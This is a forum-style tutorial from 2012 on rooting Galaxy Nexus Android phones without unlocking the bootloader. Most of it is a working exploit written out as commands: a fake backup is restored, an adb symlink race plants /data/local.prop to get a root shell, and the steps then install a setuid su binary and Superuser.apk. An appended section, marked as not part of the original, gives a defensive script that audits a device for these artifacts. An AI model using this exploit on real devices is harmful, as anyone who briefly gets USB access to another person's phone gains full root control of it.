As of Oct 10, 2012: Google has patched this vulnerability starting with JRO03U. That is to say, this works on versions of ICS and JB from ITL41D to JRO03O inclusive. It will not work for JRO03U or newer.

Once you have root, you can use segv11's BootUnlocker app to unlock your bootloader without wiping anything. Easy as pie!

(My previous guide found here only worked on Android versions 4.0.1 and 4.0.2, i.e., ITL41D/F and ICL53F.) I just isolated the parts required for the GNex, modified it slightly and eliminated the script.

So, it looks like Bin4ry (with the help of a couple of others) has managed to find a way to exploit a timing difference in the "adb restore" command. See source here. (Although this may be old news to some, I hadn't seen it before a few days ago.) This is more for informational purposes, as having a Nexus device, we are able to back up our data, unlock the bootloader and restore the backup, so this guide is not really that useful for most, but you still have those users who are scared to unlock their bootloader. It is useful, however, for those with a broken power button, as it allows them to unlock their bootloader without the power button.

How this works

The way this works is as follows: the "adb restore" command needs to be able to write to /data to restore a backup. Because of this, we can find a way to write something to /data while this is being done. Now, Android parses a file called /data/local.prop on boot. If the following line exists in local.prop, it will boot your device in emulator mode with root shell access: ro.kernel.qemu=1. So, if we can place a file called local.prop with the aforementioned line in /data, once your device boots, it will boot in emulator mode and the shell user has root access, so we now can mount the system partition as r/w.

So what does this all mean:

You can now root any version of ICS and JB released to date without having to unlock your bootloader (and without losing your data).

Moreover, you should now be able to root your device even if your hardware buttons are not working.

Additionally, this allows those who have not received an OTA update and want to apply it without having an unlocked bootloader or root to do so by copying the OTA update to /cache from /sdcard.

Notes:

1) Please read the entire post before attempting this.

2) This does not wipe any of your data, but I take no responsibility if something happens and you lose your data. Maybe consider doing a backup as per this thread before attempting this.

3) This assumes that you have USB Debugging enabled on your device and the drivers for your device installed on your computer. For the drivers, I would recommend you remove all old drivers and install these. If you don't know how to install them, or are having issues, look here.

4) This obviously needs to be done over ADB, as you cannot run adb in a terminal emulator on-device. If you do not have ADB, I've attached it in the zip (Windows and Linux versions). Unzip all files.

Step-by-step:

1) Download the attached files to your computer and unzip them;

2) Open a command prompt in that same directory;

3) Copy the root files to your device:

    adb push su /data/local/tmp/su
    adb push Superuser.apk /data/local/tmp/Superuser.apk

4) Restore the fake "backup":

    adb restore fakebackup.ab

5) Run the "exploit":

    adb shell "while ! ln -s /data/local.prop /data/data/com.android.settings/a/file99; do :; done"

6) Now that the "exploit" is running, click restore on your device.

7) Once it finishes, reboot your device:

    adb reboot

Note: it will be laggy and the screen will flicker -- this is normal.

8) Once it is rebooted, open a shell:

    adb shell

Note: Once you do step 8, you should have a root shell, i.e., your prompt should be #, not $. If not, it did not work. Start again from step 4. (It may take a few tries for it to work. Thanks segv11.)

Now we can copy su and Superuser.apk to the correct spots to give us root.

9) Mount the system partition as r/w:

    mount -o remount,rw -t ext4 /dev/block/mmcblk0p1 /system

10) Copy su to /system:

    cat /data/local/tmp/su > /system/bin/su

11) Change permissions on su:

    chmod 06755 /system/bin/su

12) Symlink su to /xbin/su:

    ln -s /system/bin/su /system/xbin/su

13) Copy Superuser.apk to /system:

    cat /data/local/tmp/Superuser.apk > /system/app/Superuser.apk

14) Change permissions on Superuser.apk:

    chmod 0644 /system/app/Superuser.apk

15) Delete the file that the exploit created:

    rm /data/local.prop

16) Exit the ADB shell:

    exit

(May have to type exit twice to get back to your command prompt.)

17) Type the following (not sure if this is needed for the GNex, but it shouldn't matter):

    adb shell "sync; sync; sync;"

18) Reboot:

    adb reboot

19) Done. You now should have root without having to unlock your bootloader. If you want to unlock now, you can without wiping anything. See segv11's app linked at the beginning of this post.

Note: If you still do not have root access after doing these steps, redo them and add this step between 10 and 11:

10b) Change the owner of su:

    chown 0.0 /system/bin/su

(Thanks maxrfon.)
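
For checking a device or an extracted image afterwards, the following added example (not part of the original post) looks for the artifacts these steps leave behind: /data/local.prop setting ro.kernel.qemu=1, a setuid su in /system, and Superuser.apk. The ROOT directory layout, the function names and the sample tree are constructed assumptions.

```shell
#!/bin/sh
# Added example: audit an Android filesystem tree (ROOT = hypothetical mount
# point or extracted image holding data/ and system/) for this guide's artifacts.

# True if the property file sets ro.kernel.qemu=1; comment lines and
# whitespace are ignored.
qemu_flag_set() {
    [ -f "$1" ] || return 1
    sed -e '/^[[:space:]]*#/d' -e 's/[[:space:]]//g' "$1" |
        grep -qx 'ro\.kernel\.qemu=1'
}

# Print one FLAG line per artifact found under ROOT.
audit_root() {
    root=$1
    if qemu_flag_set "$root/data/local.prop"; then
        echo "FLAG data/local.prop sets ro.kernel.qemu=1"
    fi
    for su in system/bin/su system/xbin/su; do
        if [ -L "$root/$su" ]; then
            echo "FLAG $su is a symlink"
        elif [ -u "$root/$su" ]; then
            echo "FLAG $su is setuid"
        fi
    done
    if [ -f "$root/system/app/Superuser.apk" ]; then
        echo "FLAG system/app/Superuser.apk is installed"
    fi
    return 0
}

# Build a constructed sample tree mirroring the state after step 14.
make_sample() {
    d=$(mktemp -d)
    mkdir -p "$d/data" "$d/system/bin" "$d/system/xbin" "$d/system/app"
    printf '# constructed sample\nro.kernel.qemu=1\n' > "$d/data/local.prop"
    : > "$d/system/bin/su"
    chmod 06755 "$d/system/bin/su"
    ln -s /system/bin/su "$d/system/xbin/su"
    : > "$d/system/app/Superuser.apk"
    echo "$d"
}

sample=$(make_sample)
audit_root "$sample"
rm -rf "$sample"
```

Because step 15 deletes /data/local.prop, a device that completed the procedure shows only the su and Superuser.apk findings; a local.prop finding means the device is still booting with a root adb shell.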